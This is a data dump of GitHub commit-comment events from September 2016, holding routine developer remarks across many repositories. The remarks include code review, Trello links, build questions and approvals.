{"id":"4529464489","type":"CommitCommentEvent","actor":{"login":"GreenLunar"},"repo":{"name":"asciimoo/searx"},"payload":{"comment":{"id":18933046,"position":null,"line":null,"path":null,"commit_id":"ce371f766a724bae26acb2221d0e1daef8acad5b","created_at":"2016-09-07T18:34:15Z","updated_at":"2016-09-07T18:34:15Z","body":"Anyway, you can notify on Transifex board too."}},"created_at":"2016-09-07T18:34:15Z"}
{"id":"4529465106","type":"CommitCommentEvent","actor":{"login":"sfkrieger"},"repo":{"name":"silas/node-consul"},"payload":{"comment":{"id":18933048,"position":null,"line":null,"path":null,"commit_id":"618a00c8929034af745a9f464627d439582a73c4","created_at":"2016-09-07T18:34:22Z","updated_at":"2016-09-07T18:34:22Z","body":"is there a reason the lock behavior of this module is marked as experimental in the readme?\r\n\r\nis there a way of locking a key value pair among nodes without using sessions/leader election if a leader doesn't need to be known? A little confused when using this aspect of the module."}},"created_at":"2016-09-07T18:34:22Z"}
{"id":"4529465291","type":"CommitCommentEvent","actor":{"login":"notwaldorf"},"repo":{"name":"PolymerElements/iron-form"},"payload":{"comment":{"id":18933049,"position":5,"line":454,"path":"iron-form.html","commit_id":"32cb3d6e48c2f58acbfc72760218cd45c05d0c13","created_at":"2016-09-07T18:34:24Z","updated_at":"2016-09-07T18:34:24Z","body":"looks like it!"}},"created_at":"2016-09-07T18:34:24Z"}
{"id":"4529465368","type":"CommitCommentEvent","actor":{"login":"DougieLawson"},"repo":{"name":"Hexxeh/rpi-firmware"},"payload":{"comment":{"id":18933050,"position":null,"line":null,"path":null,"commit_id":"b0ef6e25679d3612a980708cf4c3907ce6e13e84","created_at":"2016-09-07T18:34:25Z","updated_at":"2016-09-07T18:34:25Z","body":"Does this update include the USB MSD & PXE bootcode? Or do we still need to use BRANCH=next for that?\r\n\r\nIf we have to stick with BRANCH=next for USB MSD & PXE booting when is that getting the 4.4.20 kernel and all the intervening missing commits?"}},"created_at":"2016-09-07T18:34:25Z"}
{"id":"4529466120","type":"CommitCommentEvent","actor":{"login":"maximegelinas"},"repo":{"name":"strawberrysass/strawberry"},"payload":{"comment":{"id":18933052,"position":null,"line":null,"path":null,"commit_id":"d0caa693825935b33dde7e65b9b3d3184462b7c0","created_at":"2016-09-07T18:34:33Z","updated_at":"2016-09-07T18:34:33Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;KdmjWEqs&#x2F;14-add-the-color-group\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add the color group</a>"}},"created_at":"2016-09-07T18:34:33Z"}
{"id":"4529468333","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cyberium/mangos-wotlk"},"payload":{"comment":{"id":18933060,"position":null,"line":null,"path":null,"commit_id":"1258a90d71a470f1a08e93c1def6768978197e5c","created_at":"2016-09-07T18:34:58Z","updated_at":"2016-09-07T18:34:58Z","body":"You should indeed maybe find out if this is redundant before pushing; is there a way I can help you find out?"}},"created_at":"2016-09-07T18:34:58Z"}
{"id":"4529468452","type":"CommitCommentEvent","actor":{"login":"maximegelinas"},"repo":{"name":"strawberrysass/strawberry"},"payload":{"comment":{"id":18933061,"position":null,"line":null,"path":null,"commit_id":"910293fa30a92d7f9390eae63e1499aa46ab9db6","created_at":"2016-09-07T18:34:59Z","updated_at":"2016-09-07T18:34:59Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;XEZQFboI&#x2F;13-add-demo-button\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add demo button</a>"}},"created_at":"2016-09-07T18:34:59Z"}
{"id":"4529469066","type":"CommitCommentEvent","actor":{"login":"Peppa-Peddler"},"repo":{"name":"Nicerova7/ParallelAlgorithmsCSUNI"},"payload":{"comment":{"id":18933062,"position":null,"line":null,"path":null,"commit_id":"fbb75c9d44e4b181abb8ac944b80ea9cc99106a5","created_at":"2016-09-07T18:35:07Z","updated_at":"2016-09-07T18:35:07Z","body":":3\n\nOn Tue, Sep 6, 2016 at 8:48 PM, Nicerova7 <notifications@github.com> wrote:\n\n> gg pes !\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Nicerova7/ParallelAlgorithmsCSUNI/commit/fbb75c9d44e4b181abb8ac944b80ea9cc99106a5#commitcomment-18921925>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQI7ojjDY01T43JGX41pffhDeydeShEhks5qnhfagaJpZM4J2dIn>\n> .\n>\n"}},"created_at":"2016-09-07T18:35:07Z"}
{"id":"4529470218","type":"CommitCommentEvent","actor":{"login":"maximegelinas"},"repo":{"name":"strawberrysass/strawberry"},"payload":{"comment":{"id":18933067,"position":null,"line":null,"path":null,"commit_id":"56a8d2e79aac2ad3baca0ca0147915cf26945562","created_at":"2016-09-07T18:35:20Z","updated_at":"2016-09-07T18:35:20Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;LWM29wH0&#x2F;12-add-the-component-group\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add the component group</a>"}},"created_at":"2016-09-07T18:35:20Z"}
{"id":"4529472697","type":"CommitCommentEvent","actor":{"login":"maximegelinas"},"repo":{"name":"strawberrysass/strawberry"},"payload":{"comment":{"id":18933077,"position":null,"line":null,"path":null,"commit_id":"baeae995010d5fa1c00ba4ebf288db7eb7f5d2b3","created_at":"2016-09-07T18:35:46Z","updated_at":"2016-09-07T18:35:46Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;VY7U7CMe&#x2F;11-add-scopes-group\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add scopes group</a>"}},"created_at":"2016-09-07T18:35:46Z"}
{"id":"4529473437","type":"CommitCommentEvent","actor":{"login":"Murzic"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18933078,"position":6,"line":6,"path":"test/services/feed_import/service_test.rb","commit_id":"aadebb41f5a05425a7e4983431ac293ce1a4006d","created_at":"2016-09-07T18:35:55Z","updated_at":"2016-09-07T18:35:55Z","body":"Yes, you're right. That was dumb :D . I have to change the second argument of the `join` method, depending of how deep  the spec is nested.\r\n And sure. The stable way is to use the app's root path to get to the `files` folder."}},"created_at":"2016-09-07T18:35:55Z"}
{"id":"4529475386","type":"CommitCommentEvent","actor":{"login":"stratakis"},"repo":{"name":"fedora-python/python3"},"payload":{"comment":{"id":18933087,"position":null,"line":null,"path":null,"commit_id":"d97ee1a5e38407a451cd55b70b429b10905fe37b","created_at":"2016-09-07T18:36:15Z","updated_at":"2016-09-07T18:36:15Z","body":"Upgrade path F23->F24 is clean with this commit.\r\n\r\nNext test: F23->F25\r\n\r\nNext commit: add versioned Obsoletes."}},"created_at":"2016-09-07T18:36:15Z"}
{"id":"4529476221","type":"CommitCommentEvent","actor":{"login":"maximegelinas"},"repo":{"name":"strawberrysass/strawberry"},"payload":{"comment":{"id":18933090,"position":null,"line":null,"path":null,"commit_id":"3b6a7b6d31468ee16996099bc9a365ff3df194f2","created_at":"2016-09-07T18:36:24Z","updated_at":"2016-09-07T18:36:24Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;9r7zggXO&#x2F;10-add-validation-functions\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add validation functions</a>"}},"created_at":"2016-09-07T18:36:24Z"}
{"id":"4529479814","type":"CommitCommentEvent","actor":{"login":"mipapo"},"repo":{"name":"Runalyze/Runalyze"},"payload":{"comment":{"id":18933096,"position":null,"line":null,"path":null,"commit_id":"1ab1015296e0796de19714ac289491542c4db57c","created_at":"2016-09-07T18:37:06Z","updated_at":"2016-09-07T18:37:06Z","body":"`@Route(\"/{_locale}\") `\r\nis removed in our online version. Should be removed here too. \r\n/dashboard uri should be separated from real home page.. \r\nIf a user is logged in a redirect should go from / to /dashboard\r\n\r\nBut I'm to tired to do this now"}},"created_at":"2016-09-07T18:37:06Z"}
{"id":"4529479828","type":"CommitCommentEvent","actor":{"login":"maximegelinas"},"repo":{"name":"strawberrysass/strawberry"},"payload":{"comment":{"id":18933097,"position":null,"line":null,"path":null,"commit_id":"aa5bd9cc63c9fd144b0aa33c6210b90a285e6e33","created_at":"2016-09-07T18:37:06Z","updated_at":"2016-09-07T18:37:06Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;aL5a6Kp5&#x2F;9-add-the-string-functions\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add the string functions</a>"}},"created_at":"2016-09-07T18:37:06Z"}
{"id":"4529481179","type":"CommitCommentEvent","actor":{"login":"maximegelinas"},"repo":{"name":"strawberrysass/strawberry"},"payload":{"comment":{"id":18933101,"position":null,"line":null,"path":null,"commit_id":"ec9436e91c859a6aff79d5322272957634bbae76","created_at":"2016-09-07T18:37:19Z","updated_at":"2016-09-07T18:37:19Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;VphoCxLU&#x2F;8-add-list-functions\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add list functions</a>"}},"created_at":"2016-09-07T18:37:19Z"}
{"id":"4529484439","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cyberium/mangos-wotlk"},"payload":{"comment":{"id":18933106,"position":null,"line":null,"path":null,"commit_id":"e7e5c3c08e6fe91cfb6c73307a45b3bf85aa7990","created_at":"2016-09-07T18:37:58Z","updated_at":"2016-09-07T18:37:58Z","body":"> I choosed to add max health as threat to the possessor. That sound good\r\nenough, it will scale automaticaly with the mob level/type.\r\n\r\nThis I don't quite understand. Other than that I am very much liking this commit!"}},"created_at":"2016-09-07T18:37:58Z"}
{"id":"4529486698","type":"CommitCommentEvent","actor":{"login":"Tofee"},"repo":{"name":"webOS-ports/luna-next-cardshell"},"payload":{"comment":{"id":18933109,"position":12,"line":167,"path":"qml/Notifications/NotificationArea.qml","commit_id":"4e00559c6b7b54d14bc73317b9987b5c65f76d52","created_at":"2016-09-07T18:38:23Z","updated_at":"2016-09-07T18:38:23Z","body":"Shouldn't it be notificationItem.notifObject.replacesId ?"}},"created_at":"2016-09-07T18:38:23Z"}
{"id":"4529487047","type":"CommitCommentEvent","actor":{"login":"machalou"},"repo":{"name":"HistoryAtState/hac"},"payload":{"comment":{"id":18933110,"position":null,"line":null,"path":null,"commit_id":"f312d7a64fd6f2f2063352eba28a20e98dabfd8f","created_at":"2016-09-07T18:38:26Z","updated_at":"2016-09-07T18:38:26Z","body":"@joewiz I did it! Very intuitive!"}},"created_at":"2016-09-07T18:38:26Z"}
{"id":"4529491606","type":"CommitCommentEvent","actor":{"login":"joewiz"},"repo":{"name":"HistoryAtState/hac"},"payload":{"comment":{"id":18933119,"position":null,"line":null,"path":null,"commit_id":"f312d7a64fd6f2f2063352eba28a20e98dabfd8f","created_at":"2016-09-07T18:39:17Z","updated_at":"2016-09-07T18:39:17Z","body":"That's great to hear!"}},"created_at":"2016-09-07T18:39:17Z"}
{"id":"4529492333","type":"CommitCommentEvent","actor":{"login":"noplay"},"repo":{"name":"GNS3/gns3-server"},"payload":{"comment":{"id":18933121,"position":null,"line":null,"path":null,"commit_id":"436543d8b82a1b49c52cd6defa38fe25b3caf22b","created_at":"2016-09-07T18:39:25Z","updated_at":"2016-09-07T18:39:25Z","body":"Thanks you got credit for this:\r\nhttps://github.com/GNS3/gns3-server/commit/62377315dd5cb968b6ae28cbbbe6d230161f3054"}},"created_at":"2016-09-07T18:39:25Z"}
{"id":"4529494625","type":"CommitCommentEvent","actor":{"login":"tmora2015"},"repo":{"name":"MauSalinas/Op.Visitas"},"payload":{"comment":{"id":18933126,"position":null,"line":null,"path":null,"commit_id":"ba13d29da9c3073282f373fb1b3916a5e7c87c07","created_at":"2016-09-07T18:39:51Z","updated_at":"2016-09-07T18:39:51Z","body":"Informe 1"}},"created_at":"2016-09-07T18:39:51Z"}
{"id":"4529494790","type":"CommitCommentEvent","actor":{"login":"WouterG"},"repo":{"name":"SpleefLeague/Core"},"payload":{"comment":{"id":18933127,"position":19,"line":19,"path":"src/main/java/com/spleefleague/core/command/commands/settemprank.java","commit_id":"02ea58e9c1c418fb1abc56048355dc8af8c6b7f1","created_at":"2016-09-07T18:39:53Z","updated_at":"2016-09-07T18:39:53Z","body":"congrats @joba"}},"created_at":"2016-09-07T18:39:53Z"}
{"id":"4529495235","type":"CommitCommentEvent","actor":{"login":"tmora2015"},"repo":{"name":"MauSalinas/Op.Visitas"},"payload":{"comment":{"id":18933128,"position":null,"line":null,"path":null,"commit_id":"ba13d29da9c3073282f373fb1b3916a5e7c87c07","created_at":"2016-09-07T18:39:58Z","updated_at":"2016-09-07T18:39:58Z","body":"Informe 1"}},"created_at":"2016-09-07T18:39:58Z"}
{"id":"4529496537","type":"CommitCommentEvent","actor":{"login":"Sesquipedalian"},"repo":{"name":"SimpleMachines/SMF2.1"},"payload":{"comment":{"id":18933135,"position":null,"line":null,"path":null,"commit_id":"65559629f0e333c93819a0b0b9cea2cb94875ad8","created_at":"2016-09-07T18:40:14Z","updated_at":"2016-09-07T18:40:14Z","body":"I guess you and I simply have different tastes when it comes to code aesthetics. :)\r\n\r\nBut it terms of resource usage, my way is more economical. Adding all possible buttons to the array and then looping through and removing some of them again is less efficient than only adding a button to the array after its test is passed. Moreover, even if a button did pass its test, we'd still need to reach in and unset its test condition, or else the legacy code in the template would needlessly conduct the test all over again when execution reached that point. So in terms of both memory usage and number of operations, my way is more economical."}},"created_at":"2016-09-07T18:40:14Z"}
{"id":"4529505884","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":18933153,"position":null,"line":null,"path":null,"commit_id":"0fe7efda564e8c4067799a0506250354fa109453","created_at":"2016-09-07T18:42:00Z","updated_at":"2016-09-07T18:42:00Z","body":"To PRE.\r\n"}},"created_at":"2016-09-07T18:42:00Z"}
{"id":"4529506010","type":"CommitCommentEvent","actor":{"login":"Abhi8861"},"repo":{"name":"Humus-/SmalLIFI"},"payload":{"comment":{"id":18933155,"position":null,"line":null,"path":null,"commit_id":"b97028db7ff64de7123ea3014796050c4215fb32","created_at":"2016-09-07T18:42:01Z","updated_at":"2016-09-07T18:42:01Z","body":"Tabulating the progress and noting down the process methodologies while working on the versions(and their dependencies to previous versions)."}},"created_at":"2016-09-07T18:42:01Z"}
{"id":"4529506311","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":18933157,"position":null,"line":null,"path":null,"commit_id":"0fe7efda564e8c4067799a0506250354fa109453","created_at":"2016-09-07T18:42:05Z","updated_at":"2016-09-07T18:42:05Z","body":"To PRO."}},"created_at":"2016-09-07T18:42:05Z"}
{"id":"4529507656","type":"CommitCommentEvent","actor":{"login":"gedion"},"repo":{"name":"andrewnicols/moodle-local_usertours"},"payload":{"comment":{"id":18933163,"position":null,"line":null,"path":null,"commit_id":"782a49e19da813a907032d3f56e8daa854cf40e4","created_at":"2016-09-07T18:42:20Z","updated_at":"2016-09-07T18:42:20Z","body":"This is great. Will you be also updating MOODLE_30_STABLE?"}},"created_at":"2016-09-07T18:42:20Z"}
{"id":"4529510542","type":"CommitCommentEvent","actor":{"login":"Murzic"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18933177,"position":42,"line":42,"path":"test/services/feed_import/service_test.rb","commit_id":"aadebb41f5a05425a7e4983431ac293ce1a4006d","created_at":"2016-09-07T18:42:53Z","updated_at":"2016-09-07T18:42:53Z","body":"I think it was here before I created the strategies. And after I've created the tests for the strategies, this test was kind of duplicating the strategies' test. So I set it as `skipped`, and left it like this, thinking that it could be of some use later."}},"created_at":"2016-09-07T18:42:53Z"}
{"id":"4529511042","type":"CommitCommentEvent","actor":{"login":"parabird"},"repo":{"name":"david-gpu/srez"},"payload":{"comment":{"id":18933179,"position":null,"line":null,"path":null,"commit_id":"90820b19e7c347c90e00db61217f27e50e00b41b","created_at":"2016-09-07T18:42:58Z","updated_at":"2016-09-07T18:42:58Z","body":"use 'pip install tensorflow',the system show:'No matching distribution found for tensorflow'. so, how i can get the tensorflow? \r\n\r\nthanks in advance"}},"created_at":"2016-09-07T18:42:58Z"}
{"id":"4529511679","type":"CommitCommentEvent","actor":{"login":"madhuthorat"},"repo":{"name":"madhuthorat/nfs-ganesha"},"payload":{"comment":{"id":18933182,"position":28,"line":257,"path":"src/FSAL/FSAL_GPFS/export.c","commit_id":"05247766eb4590dbdcbb728b6e35304deda4bae0","created_at":"2016-09-07T18:43:07Z","updated_at":"2016-09-07T18:43:07Z","body":"Change made to restore credentials after the call."}},"created_at":"2016-09-07T18:43:07Z"}
{"id":"4529512467","type":"CommitCommentEvent","actor":{"login":"Haxk20"},"repo":{"name":"silver13/h8mini-testing"},"payload":{"comment":{"id":18933187,"position":null,"line":null,"path":null,"commit_id":"d6363393b38ed5029911a9a3e2a1fc309cfe7088","created_at":"2016-09-07T18:43:16Z","updated_at":"2016-09-07T18:43:16Z","body":"I pressed scan waited but nothing i dont see nothing but how to make sure that BLE beacon is enabled if i press device tab in the app i have first 3 with green \\/ (OK) anf other are disabled"}},"created_at":"2016-09-07T18:43:16Z"}
{"id":"4529514664","type":"CommitCommentEvent","actor":{"login":"madhuthorat"},"repo":{"name":"madhuthorat/nfs-ganesha"},"payload":{"comment":{"id":18933195,"position":null,"line":null,"path":null,"commit_id":"05247766eb4590dbdcbb728b6e35304deda4bae0","created_at":"2016-09-07T18:43:39Z","updated_at":"2016-09-07T18:43:39Z","body":"Thank you for reviewing, changes made to restore credentials after the call."}},"created_at":"2016-09-07T18:43:39Z"}
{"id":"4529517360","type":"CommitCommentEvent","actor":{"login":"ddunbar"},"repo":{"name":"aciidb0mb3r/swift-package-manager"},"payload":{"comment":{"id":18933204,"position":4,"line":224,"path":"Sources/SourceControl/GitRepository.swift","commit_id":"729639c4d8ff7cca06b711de33be06b5ad17c929","created_at":"2016-09-07T18:44:10Z","updated_at":"2016-09-07T18:44:10Z","body":"Let's call this `fetch`."}},"created_at":"2016-09-07T18:44:10Z"}
{"id":"4529517640","type":"CommitCommentEvent","actor":{"login":"andela-bmakinwa"},"repo":{"name":"andela-amagana/checkpoint-one-music-library-"},"payload":{"comment":{"id":18933205,"position":2,"line":2,"path":"lib/concerns/model_helper.rb","commit_id":"035b1eada2d98d9297ed08386ece94bc7343e6cf","created_at":"2016-09-07T18:44:12Z","updated_at":"2016-09-07T18:44:12Z","body":"**Critical - Code Quality**\r\nHere, you want to namespace with the module  `Concerns` and have a nested module named `ModelHelper`.\r\n\r\nHence, you'll have:\r\n```\r\nmodule Concerns\r\n  module ModelHelper\r\n    def self.included(base)\r\n      ..\r\n    end\r\n....\r\n```"}},"created_at":"2016-09-07T18:44:12Z"}
{"id":"4529518611","type":"CommitCommentEvent","actor":{"login":"mellinoe"},"repo":{"name":"dotnet/buildtools"},"payload":{"comment":{"id":18933208,"position":14,"line":23,"path":"src/Microsoft.DotNet.Build.Tasks/PackageFiles/tool-runtime/project.json","commit_id":"42226639044761504a6aaaa8e8580359765c0de0","created_at":"2016-09-07T18:44:22Z","updated_at":"2016-09-07T18:44:22Z","body":"Yes, you're right. I can remove the explicit reference."}},"created_at":"2016-09-07T18:44:22Z"}
{"id":"4529518726","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":18933209,"position":null,"line":null,"path":null,"commit_id":"e190948969f53fd27de4024c7136d57b96ede2d1","created_at":"2016-09-07T18:44:23Z","updated_at":"2016-09-07T18:44:23Z","body":"To PRE."}},"created_at":"2016-09-07T18:44:23Z"}
{"id":"4529519158","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":18933210,"position":null,"line":null,"path":null,"commit_id":"e190948969f53fd27de4024c7136d57b96ede2d1","created_at":"2016-09-07T18:44:27Z","updated_at":"2016-09-07T18:44:27Z","body":"To PRO."}},"created_at":"2016-09-07T18:44:27Z"}
{"id":"4529520191","type":"CommitCommentEvent","actor":{"login":"toilethinges"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18933212,"position":null,"line":null,"path":null,"commit_id":"71f4105a37f73968fe18cd4b63f49d62b723aad0","created_at":"2016-09-07T18:44:40Z","updated_at":"2016-09-07T18:44:40Z","body":"> Yes, @KiLEdEnNis, we all know you are a fan of cheating."}},"created_at":"2016-09-07T18:44:40Z"}
{"id":"4529531375","type":"CommitCommentEvent","actor":{"login":"yarikoptic"},"repo":{"name":"datalad/datalad"},"payload":{"comment":{"id":18933234,"position":7,"line":377,"path":"datalad/distribution/create_publication_target_sshwebserver.py","commit_id":"02cfadc41ae5037a4a8962f723781fc7df6a4b26","created_at":"2016-09-07T18:46:50Z","updated_at":"2016-09-07T18:46:50Z","body":"Please while at it, save log within dataset path (.git/datalad/logs/). Saving into a predictable publicly available part is considered an insecurity..."}},"created_at":"2016-09-07T18:46:50Z"}
{"id":"4529533782","type":"CommitCommentEvent","actor":{"login":"andela-bmakinwa"},"repo":{"name":"andela-amagana/checkpoint-one-music-library-"},"payload":{"comment":{"id":18933241,"position":12,"line":11,"path":"lib/concerns/model_helper.rb","commit_id":"035b1eada2d98d9297ed08386ece94bc7343e6cf","created_at":"2016-09-07T18:47:18Z","updated_at":"2016-09-07T18:47:18Z","body":"After addressing the comment above, you can have a module named `ClassMethods`.\r\n\r\nHence, you'll have:\r\n```\r\nmodule Concerns\r\n  module ModelHelper\r\n    def self.included(base)\r\n      base.extend(ClassMethods)\r\n    end\r\n    ...\r\n    module ClassMethods\r\n      def create(name)\r\n        ...\r\n      end\r\n..."}},"created_at":"2016-09-07T18:47:18Z"}
{"id":"4529534466","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18933243,"position":null,"line":null,"path":null,"commit_id":"844e4ef7c95aa2930fcb5dc76f9c16affc6b8770","created_at":"2016-09-07T18:47:26Z","updated_at":"2016-09-07T18:47:26Z","body":"Hi,\r\n\r\nI have explained it all here https://groups.google.com/forum/?fromgroups=#!topic/fishcooking/88K7AxoPLJs"}},"created_at":"2016-09-07T18:47:26Z"}
{"id":"4529539113","type":"CommitCommentEvent","actor":{"login":"sorawee"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18933256,"position":237,"line":494,"path":"src/web/js/trove/d3-lib.js","commit_id":"dc515df3593b75bd82747dc579c1cde873e1fcb1","created_at":"2016-09-07T18:48:22Z","updated_at":"2016-09-07T18:48:22Z","body":"@jpolitz \r\n\r\n> it seems like the idea is that initially, the stack gets paused, but when the stack is already paused, it simply calls the callback directly, and this is controlled by the restarter parameter.\r\n\r\nCorrect. That's what I intended.\r\n\r\n> An issue I see is that if restarter is nothing, and interact is true, then this function may try to call pauseStack when there is no stack running. The interact pause will trigger on line 474, and then another pause will trigger on 500 before the first has restarted. That seems like a bug on my first reading.\r\n\r\nWhen would that happen? There are two cases where this function will be called.\r\n\r\n1. Called from Pyret side. In this case, I maintain an invariant that the restarter will be `nothing`\r\n2. Recursive call. In this case, it gets called with a valid restarter from previous `pauseStack`.\r\n\r\nThere shouldn't be an issue, correct?"}},"created_at":"2016-09-07T18:48:22Z"}
{"id":"4529540426","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18933257,"position":null,"line":null,"path":null,"commit_id":"e986cb3425547cb85fee48b88727609919cde827","created_at":"2016-09-07T18:48:39Z","updated_at":"2016-09-07T18:48:39Z","body":"Maybe some compromise of 10 or such could be made, but I've got no idea about the performance impact."}},"created_at":"2016-09-07T18:48:39Z"}
{"id":"4529542158","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18933261,"position":5,"line":252,"path":"app/sessionStore.js","commit_id":"707868014f5d8a330c300cf29bb81dc0aff7c3d8","created_at":"2016-09-07T18:48:58Z","updated_at":"2016-09-07T18:48:58Z","body":"++, though there should also be a way to clear this without having to close the browser. i'll open an issue"}},"created_at":"2016-09-07T18:48:58Z"}
{"id":"4529542373","type":"CommitCommentEvent","actor":{"login":"bmmpxf"},"repo":{"name":"boundlessgeo/suite"},"payload":{"comment":{"id":18933263,"position":38,"line":38,"path":"docs/usermanual/source/install/mac/tomcat/geoserver/install.rst","commit_id":"77544b7ff0714cb3c817f4c97b5c0e1a09efa676","created_at":"2016-09-07T18:49:01Z","updated_at":"2016-09-07T18:49:01Z","body":"ahem"}},"created_at":"2016-09-07T18:49:01Z"}
{"id":"4529543533","type":"CommitCommentEvent","actor":{"login":"bmmpxf"},"repo":{"name":"boundlessgeo/suite"},"payload":{"comment":{"id":18933267,"position":45,"line":45,"path":"docs/usermanual/source/install/mac/tomcat/geoserver/install.rst","commit_id":"77544b7ff0714cb3c817f4c97b5c0e1a09efa676","created_at":"2016-09-07T18:49:14Z","updated_at":"2016-09-07T18:49:14Z","body":"ditto"}},"created_at":"2016-09-07T18:49:14Z"}
{"id":"4529545975","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18933275,"position":5,"line":252,"path":"app/sessionStore.js","commit_id":"707868014f5d8a330c300cf29bb81dc0aff7c3d8","created_at":"2016-09-07T18:49:41Z","updated_at":"2016-09-07T18:49:41Z","body":"also please document this in docs/state.md `siteSettings`"}},"created_at":"2016-09-07T18:49:41Z"}
{"id":"4529548359","type":"CommitCommentEvent","actor":{"login":"ekoly"},"repo":{"name":"facebook/facebook-python-ads-sdk"},"payload":{"comment":{"id":18933287,"position":null,"line":null,"path":null,"commit_id":"9a221e5c92e1f8c6164cb5e24b4f5da72efc8b1c","created_at":"2016-09-07T18:50:12Z","updated_at":"2016-09-07T18:50:12Z","body":"This is a fix for https://github.com/facebook/facebook-python-ads-sdk/issues/250. There have been problems with type in this code block, because `data` can potentially be a string or list that contains one of the keys (say, 'my_images'); this results in an error because `response['images']` does not make sense if response is a string or list."}},"created_at":"2016-09-07T18:50:12Z"}
{"id":"4529549933","type":"CommitCommentEvent","actor":{"login":"howchmo"},"repo":{"name":"howchmo/reebis"},"payload":{"comment":{"id":18933292,"position":null,"line":null,"path":null,"commit_id":"ed897736db34cf3d3fd5c6e8f3a54b9e2ed1def3","created_at":"2016-09-07T18:50:27Z","updated_at":"2016-09-07T18:50:27Z","body":"This commit is a solution for this bug:\r\nhttps://github.com/howchmo/reebis/issues/8"}},"created_at":"2016-09-07T18:50:27Z"}
{"id":"4529550992","type":"CommitCommentEvent","actor":{"login":"sdgathman"},"repo":{"name":"hellerbarde/stapler"},"payload":{"comment":{"id":18933297,"position":null,"line":null,"path":null,"commit_id":"1eb0ca6ec99fc5f3e39342109b18f098d3ffe17d","created_at":"2016-09-07T18:50:41Z","updated_at":"2016-09-07T18:50:41Z","body":"Looks like Fedora puts back in roundrobinLIST, which is the only thing pulled from more_itertools.  No Fedora package provides more_itertools.  So I guess the plan is to keep putting back roundrobinLIST and taking out import more_itertools.  :-)"}},"created_at":"2016-09-07T18:50:41Z"}
{"id":"4529552634","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cyberium/mangos-wotlk"},"payload":{"comment":{"id":18933301,"position":null,"line":null,"path":null,"commit_id":"e7e5c3c08e6fe91cfb6c73307a45b3bf85aa7990","created_at":"2016-09-07T18:51:01Z","updated_at":"2016-09-07T18:51:01Z","body":"> Now possessed creature threat will be set afte…\r\n…r the possess and all creatures aggroed will attack the possessor.\r\n\r\nThis is very right, not wrong at all, but I figure you were asking about the way you scale it, which I have no idea about."}},"created_at":"2016-09-07T18:51:01Z"}
{"id":"4529554292","type":"CommitCommentEvent","actor":{"login":"fahdoo"},"repo":{"name":"dnanexus/dx-javascript-toolkit"},"payload":{"comment":{"id":18933304,"position":null,"line":null,"path":null,"commit_id":"395082580ca0de34fba44d30ab080a26e2ee36fc","created_at":"2016-09-07T18:51:21Z","updated_at":"2016-09-07T18:51:21Z","body":"LGTM"}},"created_at":"2016-09-07T18:51:21Z"}
{"id":"4529557450","type":"CommitCommentEvent","actor":{"login":"ddunbar"},"repo":{"name":"aciidb0mb3r/swift-package-manager"},"payload":{"comment":{"id":18933319,"position":87,"line":425,"path":"Sources/Commands/Workspace.swift","commit_id":"729639c4d8ff7cca06b711de33be06b5ad17c929","created_at":"2016-09-07T18:51:57Z","updated_at":"2016-09-07T18:51:57Z","body":"There isn't a need to break this out, if it is an error it should fail at the place that uses it."}},"created_at":"2016-09-07T18:51:57Z"}
